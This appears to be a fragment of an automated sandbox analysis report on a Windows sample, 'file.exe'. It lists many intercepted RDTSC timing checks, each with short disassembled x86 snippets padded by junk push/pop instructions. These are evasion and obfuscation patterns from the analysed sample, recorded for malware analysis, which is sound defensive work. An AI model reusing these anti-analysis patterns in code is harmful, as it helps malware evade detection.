              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 122D136 second address: 122D13D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 popad 0x00000007 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 122D13D second address: 122D143 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 122D143 second address: 122D147 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 122E084 second address: 122E090 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 pop edx 0x00000006 push eax 0x00000007 pushad 0x00000008 push eax 0x00000009 push edx 0x0000000a pushad 0x0000000b popad 0x0000000c rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 122DEFD second address: 122DF05 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 122E090 second address: 122E094 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 122FD26 second address: 122FD3C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FD7F8BAA161h 0x00000009 popad 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 122FD3C second address: 122FD53 instructions: 0x00000000 rdtsc 0x00000002 jnc 00007FD7F8DB51E8h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f jnc 00007FD7F8DB51E6h 0x00000015 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 122FD53 second address: 122FD59 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 122FD59 second address: 122FD71 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FD7F8DB51F3h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12307DE second address: 12307E4 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12307E4 second address: 1230890 instructions: 0x00000000 rdtsc 0x00000002 jl 00007FD7F8DB51F5h 0x00000008 jmp 00007FD7F8DB51EFh 0x0000000d pop edx 0x0000000e pop eax 0x0000000f mov dword ptr [esp], eax 0x00000012 push 00000000h 0x00000014 push eax 0x00000015 call 00007FD7F8DB51E8h 0x0000001a pop eax 0x0000001b mov dword ptr [esp+04h], eax 0x0000001f add dword ptr [esp+04h], 0000001Dh 0x00000027 inc eax 0x00000028 push eax 0x00000029 ret 0x0000002a pop eax 0x0000002b ret 0x0000002c add dword ptr [ebp+122D339Fh], esi 0x00000032 push 00000000h 0x00000034 push 00000000h 0x00000036 push ebp 0x00000037 call 00007FD7F8DB51E8h 0x0000003c pop ebp 0x0000003d mov dword ptr [esp+04h], ebp 0x00000041 add dword ptr [esp+04h], 00000017h 0x00000049 inc ebp 0x0000004a push ebp 0x0000004b ret 0x0000004c pop ebp 0x0000004d ret 0x0000004e push 00000000h 0x00000050 push 00000000h 0x00000052 push ecx 0x00000053 call 00007FD7F8DB51E8h 0x00000058 pop ecx 0x00000059 mov dword ptr [esp+04h], ecx 0x0000005d add dword ptr [esp+04h], 0000001Ah 0x00000065 inc ecx 0x00000066 push ecx 0x00000067 ret 0x00000068 pop ecx 0x00000069 ret 0x0000006a or dword ptr [ebp+122D2AE2h], edx 0x00000070 sbb di, 4680h 0x00000075 xchg eax, ebx 0x00000076 push eax 0x00000077 push edx 0x00000078 jmp 00007FD7F8DB51F2h 0x0000007d rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12773A2 second address: 12773C9 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD7F8DB51F5h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b je 00007FD7F8DB51E6h 0x00000011 jp 00007FD7F8DB51E6h 0x00000017 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12773C9 second address: 12773CF instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1276F61 second address: 1276F65 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1276F65 second address: 1276F69 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 127B3B8 second address: 127B3BE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 127B3BE second address: 127B3CE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 jbe 00007FD7F8BAA156h 0x0000000c pushad 0x0000000d popad 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 127B504 second address: 127B508 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 127B508 second address: 127B526 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 js 00007FD7F8BAA166h 0x0000000e rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 127B526 second address: 127B548 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 je 00007FD7F8DB51E6h 0x00000009 jmp 00007FD7F8DB51F7h 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 127BAF1 second address: 127BAF7 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 127BAF7 second address: 127BAFD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 127BAFD second address: 127BB01 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 127BB01 second address: 127BB26 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD7F8DB51F7h 0x00000007 pushad 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d jne 00007FD7F8DB51E6h 0x00000013 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 127BB26 second address: 127BB2A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1280137 second address: 128013B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 128013B second address: 1280141 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1280141 second address: 1280147 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1280147 second address: 128014D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 128014D second address: 1280151 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1280410 second address: 1280418 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edi 0x00000005 pop edi 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1280418 second address: 128041C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 128041C second address: 1280420 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1280420 second address: 1280448 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 jmp 00007FD7F8DB51EEh 0x0000000e pushad 0x0000000f popad 0x00000010 popad 0x00000011 pop edx 0x00000012 pop eax 0x00000013 push eax 0x00000014 push edx 0x00000015 pushad 0x00000016 pushad 0x00000017 popad 0x00000018 pushad 0x00000019 popad 0x0000001a push esi 0x0000001b pop esi 0x0000001c pushad 0x0000001d popad 0x0000001e popad 0x0000001f rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1280448 second address: 128045A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FD7F8BAA15Ch 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 128045A second address: 128045E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 128045E second address: 1280480 instructions: 0x00000000 rdtsc 0x00000002 js 00007FD7F8BAA156h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007FD7F8BAA166h 0x00000011 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1280480 second address: 128048A instructions: 0x00000000 rdtsc 0x00000002 js 00007FD7F8DB51E6h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 123474E second address: 12347CF instructions: 0x00000000 rdtsc 0x00000002 ja 00007FD7F8BAA156h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop ebx 0x0000000b nop 0x0000000c push 00000000h 0x0000000e push edi 0x0000000f call 00007FD7F8BAA158h 0x00000014 pop edi 0x00000015 mov dword ptr [esp+04h], edi 0x00000019 add dword ptr [esp+04h], 0000001Ch 0x00000021 inc edi 0x00000022 push edi 0x00000023 ret 0x00000024 pop edi 0x00000025 ret 0x00000026 mov edx, edi 0x00000028 mov ebx, dword ptr [ebp+124878FFh] 0x0000002e and cx, FD9Fh 0x00000033 jne 00007FD7F8BAA15Ch 0x00000039 add eax, ebx 0x0000003b or dword ptr [ebp+122D2638h], ecx 0x00000041 nop 0x00000042 pushad 0x00000043 push ebx 0x00000044 jmp 00007FD7F8BAA15Fh 0x00000049 pop ebx 0x0000004a pushad 0x0000004b jmp 00007FD7F8BAA15Eh 0x00000050 js 00007FD7F8BAA156h 0x00000056 popad 0x00000057 popad 0x00000058 push eax 0x00000059 push ecx 0x0000005a push eax 0x0000005b push edx 0x0000005c pushad 0x0000005d popad 0x0000005e rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12347CF second address: 1234811 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop ecx 0x00000007 nop 0x00000008 push 00000000h 0x0000000a push ebp 0x0000000b call 00007FD7F8DB51E8h 0x00000010 pop ebp 0x00000011 mov dword ptr [esp+04h], ebp 0x00000015 add dword ptr [esp+04h], 0000001Ch 0x0000001d inc ebp 0x0000001e push ebp 0x0000001f ret 0x00000020 pop ebp 0x00000021 ret 0x00000022 push 00000004h 0x00000024 mov ecx, dword ptr [ebp+122D189Fh] 0x0000002a push eax 0x0000002b pushad 0x0000002c push ebx 0x0000002d jc 00007FD7F8DB51E6h 0x00000033 pop ebx 0x00000034 push eax 0x00000035 push edx 0x00000036 pushad 0x00000037 popad 0x00000038 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 128085A second address: 1280861 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 popad 0x00000007 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1281259 second address: 128126A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FD7F8DB51EDh 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 128126A second address: 1281275 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12847A0 second address: 12847AC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 pushad 0x00000007 popad 0x00000008 popad 0x00000009 pushad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12847AC second address: 12847B2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12847B2 second address: 12847B7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 128ABDB second address: 128ABFC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 jmp 00007FD7F8BAA169h 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 128AFDB second address: 128AFE1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 128B59F second address: 128B5A4 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 128B5A4 second address: 128B5AA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 128B87A second address: 128B889 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 popad 0x00000007 jnp 00007FD7F8BAA15Ch 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 128BAF8 second address: 128BB1D instructions: 0x00000000 rdtsc 0x00000002 jnl 00007FD7F8DB51E6h 0x00000008 jmp 00007FD7F8DB51EDh 0x0000000d pop edx 0x0000000e pop eax 0x0000000f jmp 00007FD7F8DB51EEh 0x00000014 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 128BD98 second address: 128BDB3 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD7F8BAA167h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 128BDB3 second address: 128BDBC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1290D3D second address: 1290D5E instructions: 0x00000000 rdtsc 0x00000002 jl 00007FD7F8BAA156h 0x00000008 je 00007FD7F8BAA156h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 pushad 0x00000011 jmp 00007FD7F8BAA15Eh 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1290D5E second address: 1290D64 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1294977 second address: 129497F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11EA4D1 second address: 11EA4D5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11EA4D5 second address: 11EA50F instructions: 0x00000000 rdtsc 0x00000002 jno 00007FD7F8BAA156h 0x00000008 push ebx 0x00000009 pop ebx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c popad 0x0000000d push ecx 0x0000000e push eax 0x0000000f jmp 00007FD7F8BAA161h 0x00000014 jmp 00007FD7F8BAA166h 0x00000019 pop eax 0x0000001a push eax 0x0000001b push eax 0x0000001c push edx 0x0000001d rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1293D18 second address: 1293D1E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1293D1E second address: 1293D2C instructions: 0x00000000 rdtsc 0x00000002 jns 00007FD7F8BAA156h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1293D2C second address: 1293D30 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1293D30 second address: 1293D39 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1293ED1 second address: 1293ED7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1293ED7 second address: 1293EDB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1294061 second address: 1294079 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD7F8DB51F4h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 129420F second address: 1294235 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jc 00007FD7F8BAA16Eh 0x0000000e push edx 0x0000000f pop edx 0x00000010 jmp 00007FD7F8BAA166h 0x00000015 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1294235 second address: 129423A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 129423A second address: 1294240 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12944DB second address: 12944DF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12944DF second address: 12944EE instructions: 0x00000000 rdtsc 0x00000002 jg 00007FD7F8BAA156h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push ecx 0x0000000b pushad 0x0000000c popad 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 129464C second address: 1294671 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 pushad 0x00000008 push esi 0x00000009 pop esi 0x0000000a pushad 0x0000000b popad 0x0000000c jmp 00007FD7F8DB51EEh 0x00000011 popad 0x00000012 push eax 0x00000013 push edx 0x00000014 jo 00007FD7F8DB51E6h 0x0000001a push ecx 0x0000001b pop ecx 0x0000001c rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1294671 second address: 1294677 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 129A574 second address: 129A590 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 jmp 00007FD7F8DB51F6h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 129A590 second address: 129A5D4 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 ja 00007FD7F8BAA156h 0x00000009 je 00007FD7F8BAA156h 0x0000000f jbe 00007FD7F8BAA156h 0x00000015 popad 0x00000016 pop edx 0x00000017 pop eax 0x00000018 push eax 0x00000019 push edx 0x0000001a pushad 0x0000001b pushad 0x0000001c popad 0x0000001d pushad 0x0000001e popad 0x0000001f jmp 00007FD7F8BAA163h 0x00000024 popad 0x00000025 jmp 00007FD7F8BAA161h 0x0000002a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 129A727 second address: 129A72E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edi 0x00000004 pop edi 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 129A72E second address: 129A739 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 push edx 0x00000008 pop edx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 129A739 second address: 129A73D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 129A73D second address: 129A75B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007FD7F8BAA160h 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 129A75B second address: 129A75F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 129A75F second address: 129A763 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 129A763 second address: 129A769 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 129AA19 second address: 129AA1D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 129AA1D second address: 129AA21 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 129ACDF second address: 129ACE5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 129ACE5 second address: 129AD0A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 popad 0x00000007 pop ecx 0x00000008 pushad 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007FD7F8DB51F8h 0x00000010 push ebx 0x00000011 pop ebx 0x00000012 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 129AFE3 second address: 129AFED instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 push ebx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 129AFED second address: 129AFFC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop ebx 0x00000007 push ebx 0x00000008 jne 00007FD7F8DB51E6h 0x0000000e pop ebx 0x0000000f rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1299D2F second address: 1299D34 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1299D34 second address: 1299D4A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FD7F8DB51F2h 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1299D4A second address: 1299D7D instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 jmp 00007FD7F8BAA163h 0x0000000c jmp 00007FD7F8BAA165h 0x00000011 pushad 0x00000012 popad 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12A1946 second address: 12A194C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12A4A37 second address: 12A4A3F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 pushad 0x00000007 popad 0x00000008 rdtsc
